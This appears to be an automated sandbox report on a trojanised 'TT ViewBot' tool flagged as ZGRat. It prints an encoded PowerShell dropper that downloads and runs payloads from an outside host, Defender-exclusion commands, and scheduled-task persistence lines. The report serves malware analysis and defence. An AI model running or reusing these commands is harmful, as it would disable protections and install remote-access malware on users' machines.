Overview
overview
10Static
static
1TT ViewBot Tool.rar
windows7-x64
10TT ViewBot Tool.rar
windows10-2004-x64
3TT ViewBot...ignore
windows7-x64
3TT ViewBot...ignore
windows10-2004-x64
3TT ViewBot...sts.py
windows7-x64
3TT ViewBot...sts.py
windows10-2004-x64
3TT ViewBot...es.txt
windows7-x64
1TT ViewBot...es.txt
windows10-2004-x64
1TT ViewBot...xie.py
windows7-x64
3TT ViewBot...xie.py
windows10-2004-x64
3TT ViewBot...ent.py
windows7-x64
3TT ViewBot...ent.py
windows10-2004-x64
3TT ViewBot...ICENSE
windows7-x64
1TT ViewBot...ICENSE
windows10-2004-x64
1TT ViewBot...DME.md
windows7-x64
3TT ViewBot...DME.md
windows10-2004-x64
3TT ViewBot...rt.exe
windows7-x64
10TT ViewBot...rt.exe
windows10-2004-x64
10TT ViewBot...tup.py
windows7-x64
3TT ViewBot...tup.py
windows10-2004-x64
3Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
07-05-2024 04:28
Static task
static1
Behavioral task
behavioral1
Sample
TT ViewBot Tool.rar
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
TT ViewBot Tool.rar
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
TT ViewBot v2.0/.gitignore
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
TT ViewBot v2.0/.gitignore
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
TT ViewBot v2.0/Data/Lists.py
Resource
win7-20240419-en
Behavioral task
behavioral6
Sample
TT ViewBot v2.0/Data/Lists.py
Resource
win10v2004-20240419-en
Behavioral task
behavioral7
Sample
TT ViewBot v2.0/Data/Proxies.txt
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
TT ViewBot v2.0/Data/Proxies.txt
Resource
win10v2004-20240419-en
Behavioral task
behavioral9
Sample
TT ViewBot v2.0/Data/ScrapProxie.py
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
TT ViewBot v2.0/Data/ScrapProxie.py
Resource
win10v2004-20240419-en
Behavioral task
behavioral11
Sample
TT ViewBot v2.0/Data/UserAgent.py
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
TT ViewBot v2.0/Data/UserAgent.py
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
TT ViewBot v2.0/LICENSE
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
TT ViewBot v2.0/LICENSE
Resource
win10v2004-20240419-en
Behavioral task
behavioral15
Sample
TT ViewBot v2.0/README.md
Resource
win7-20240220-en
Behavioral task
behavioral16
Sample
TT ViewBot v2.0/README.md
Resource
win10v2004-20240419-en
Behavioral task
behavioral17
Sample
TT ViewBot v2.0/bot_start.exe
Resource
win7-20240419-en
Behavioral task
behavioral18
Sample
TT ViewBot v2.0/bot_start.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral19
Sample
TT ViewBot v2.0/setup.py
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
TT ViewBot v2.0/setup.py
Resource
win10v2004-20240419-en
General
-
Target
TT ViewBot v2.0/bot_start.exe
-
Size
2.5MB
-
MD5
bf4a8b1ff2f896acac3e7ace357abfca
-
SHA1
c1bd1b3d2959d844f6b4e339f45d3749667df3e1
-
SHA256
e0d1d7c74b52bbd40f5dc85cb9b3ab69ae750d8fc3f5fbd15a98eed616c1ce8e
-
SHA512
fd7082a905540e23a5c5b6fd2717c0255ede2680bef16076f174d417bbeef4694e2fa82a8f9e0407cc160344cc194edd19ab40901b468c1695a1b8773e23e494
-
SSDEEP
49152:Tfx0DZfVUfCnJA3bxBLbsgyGKEQYdfT3kVYCNN5oUpwmJFkjQuQLLOet:l4ZnIlBvyGKJA3kVD4lIl7r
Malware Config
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral18/files/0x0007000000023447-55.dat family_zgrat_v1 behavioral18/files/0x000b0000000233d6-73.dat family_zgrat_v1 behavioral18/memory/3524-75-0x0000000000E00000-0x0000000001006000-memory.dmp family_zgrat_v1 -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1108 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1956 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4472 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 424 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2840 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4952 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3996 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3104 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5068 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2016 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4520 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4892 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4276 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3620 1412 schtasks.exe 90 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2296 1412 schtasks.exe 90 -
Blocklisted process makes network request 1 IoCs
flow pid Process 26 4464 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3628 powershell.exe 4464 powershell.exe 4852 powershell.exe 3840 powershell.exe 1968 powershell.exe 4464 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation tthyperRuntimedhcpSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation tthyperRuntimedhcpSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation bot_start.exe -
Executes dropped EXE 3 IoCs
pid Process 2968 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 5024 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1388 bot_start.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe tthyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Windows Media Player\es-ES\66fc9ff0ee96c2 tthyperRuntimedhcpSvc.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\Telephony\RuntimeBroker.exe tthyperRuntimedhcpSvc.exe File created C:\Windows\Logs\Telephony\9e8d7a4ca61bd9 tthyperRuntimedhcpSvc.exe File created C:\Windows\Logs\Telephony\RuntimeBroker.exe tthyperRuntimedhcpSvc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 424 schtasks.exe 4952 schtasks.exe 2016 schtasks.exe 4520 schtasks.exe 4892 schtasks.exe 4276 schtasks.exe 3620 schtasks.exe 1956 schtasks.exe 3104 schtasks.exe 5068 schtasks.exe 1108 schtasks.exe 4472 schtasks.exe 2840 schtasks.exe 3996 schtasks.exe 2296 schtasks.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings tthyperRuntimedhcpSvc.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings tthyperRuntimedhcpSvc.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3936 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4464 powershell.exe 4464 powershell.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe 3524 tthyperRuntimedhcpSvc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5024 cmd.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 3524 tthyperRuntimedhcpSvc.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 5024 cmd.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1388 bot_start.exe 3600 OpenWith.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1388 wrote to memory of 4464 1388 bot_start.exe 83 PID 1388 wrote to memory of 4464 1388 bot_start.exe 83 PID 1388 wrote to memory of 4464 1388 bot_start.exe 83 PID 4464 wrote to memory of 2968 4464 powershell.exe 93 PID 4464 wrote to memory of 2968 4464 powershell.exe 93 PID 4464 wrote to memory of 2968 4464 powershell.exe 93 PID 2968 wrote to memory of 1416 2968 tthyperRuntimedhcpSvc.exe 95 PID 2968 wrote to memory of 1416 2968 tthyperRuntimedhcpSvc.exe 95 PID 2968 wrote to memory of 1416 2968 tthyperRuntimedhcpSvc.exe 95 PID 1416 wrote to memory of 2488 1416 WScript.exe 100 PID 1416 wrote to memory of 2488 1416 WScript.exe 100 PID 1416 wrote to memory of 2488 1416 WScript.exe 100 PID 2488 wrote to memory of 3524 2488 cmd.exe 102 PID 2488 wrote to memory of 3524 2488 cmd.exe 102 PID 3524 wrote to memory of 3628 3524 tthyperRuntimedhcpSvc.exe 118 PID 3524 wrote to memory of 3628 3524 tthyperRuntimedhcpSvc.exe 118 PID 3524 wrote to memory of 4464 3524 tthyperRuntimedhcpSvc.exe 119 PID 3524 wrote to memory of 4464 3524 tthyperRuntimedhcpSvc.exe 119 PID 3524 wrote to memory of 4852 3524 tthyperRuntimedhcpSvc.exe 120 PID 3524 wrote to memory of 4852 3524 tthyperRuntimedhcpSvc.exe 120 PID 3524 wrote to memory of 3840 3524 tthyperRuntimedhcpSvc.exe 121 PID 3524 wrote to memory of 3840 3524 tthyperRuntimedhcpSvc.exe 121 PID 3524 wrote to memory of 1968 3524 tthyperRuntimedhcpSvc.exe 122 PID 3524 wrote to memory of 1968 3524 tthyperRuntimedhcpSvc.exe 122 PID 3524 wrote to memory of 4768 3524 tthyperRuntimedhcpSvc.exe 128 PID 3524 wrote to memory of 4768 3524 tthyperRuntimedhcpSvc.exe 128 PID 4768 wrote to memory of 980 4768 cmd.exe 130 PID 4768 wrote to memory of 980 4768 cmd.exe 130 PID 4768 wrote to memory of 3936 4768 cmd.exe 131 PID 4768 wrote to memory of 3936 4768 cmd.exe 131 PID 4768 wrote to memory of 5024 4768 cmd.exe 132 PID 4768 wrote to memory of 5024 4768 cmd.exe 132 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe"C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBuAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBqAHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGoAdABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegB2AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABtAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAZAB1AGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHgAaAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwB1AGUAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAHUAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGEAYQBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAawBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZQB0AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB4AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB4AHYAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBtAGEAaQBuAC4AcAB5ACcAKQA8ACMAYwB1AGwAIwA+AA=="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\ChainReview\tthyperRuntimedhcpSvc.exe"C:\ChainReview/tthyperRuntimedhcpSvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Logs\Telephony\RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Videos\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\dllhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\unsecapp.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HY63mn26BU.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\system32\chcp.comchcp 650018⤵PID:980
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:3936
-
-
C:\Users\Admin\Videos\cmd.exe"C:\Users\Admin\Videos\cmd.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
-
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Windows\Logs\Telephony\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Logs\Telephony\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\Telephony\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Videos\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\Videos\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Videos\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2296
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
91B
MD56c4e82d40f84cbc9a6fec4a5a981a42d
SHA1b9b43a7e2f9f4ad4767974bf4304a9e2a044fca3
SHA25678d5a5d4618dce787ecc963e5f499af55e8c733b28842311f59d4f385ec42d5b
SHA512262c93cb040935bd1f3b7ef8140e6ac322a9601ebb0004b5da24edea0b268db6b178f1d3c5d62c6e95b717603a3d29a00c56f90c8c3479b98335617e42700842
-
Filesize
2.0MB
MD54518369532566e624ed62d5715fc072c
SHA1c8a4e4d75a1d3ef9e772b7264d61a4a65c37db33
SHA256ad29e830bbc1cb324af918e800caed762d0d2e5a76cdca70cd3926d06add78f0
SHA512d08d1124262cb10862562cccb7c4c1af0a9cc1c0f298fa8a596d528fb8b8be4804217c648de327f57c360267ab756db35b067f3961d1efd50b409a04a1505ae0
-
Filesize
212B
MD543e82435c4abdf7a34d3f8ac5c575deb
SHA16d41a829dc856e7d911e8a95e8a4c7463cf18043
SHA2561a8093c1223cfab24ebb1185ee1e5ac65909caf9ee9d5d6dc600c82a5d040acf
SHA512e05cd9e7d232e452cc337335603864368ec042a7f6e322a4d76eb62ada78fca956a17a93d97c86b859e2114f8b2d6d2a0cb60190b8dad6797a62c31d92e6037f
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
19KB
MD56ed1ca43698bf22b1e271edc9e3d205a
SHA1623deddb7124871cfa8d050cd7cc4874c024c560
SHA256ebab290a9795a813c9424e0e931d4b685dc3686749fa456ca5bc99659ec940fc
SHA51257bee7e72ac2e845d28496c01533f82dde7e0a4e7f167edfb405545f5e4d88ae1d00dbf97a6877615e3dbd43b44afc4f443ea4a72a1a8b962bd990ccdc4b3a70
-
Filesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
Filesize
157B
MD58446771aa1c1a851bcad5efd6c26a39e
SHA10b761f291650d8ff2ffce6d3e5fbddfff4f2366d
SHA2563dbd0d738dedc627793ba7698a183a7b9d605c9760ad272f67ff80c037a384a4
SHA512b97a8a29bdd92afb6fd3fd9fba50da5c532da744d95e01a015ecaceac38d31fc6a9423b62d1fe5d417ce846eac29df0ba01ad0729361804ba8f6dd2a7ddfba78
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.3MB
MD5ce2e801c8d8413da9fe8f98723aab971
SHA1784e4689c62131f43e4c9cd5883f433b88cf08d6
SHA25679af1d0cd368f54b46320eceb7d9931049daf12207ff5e2226f10d9f8e068ca2
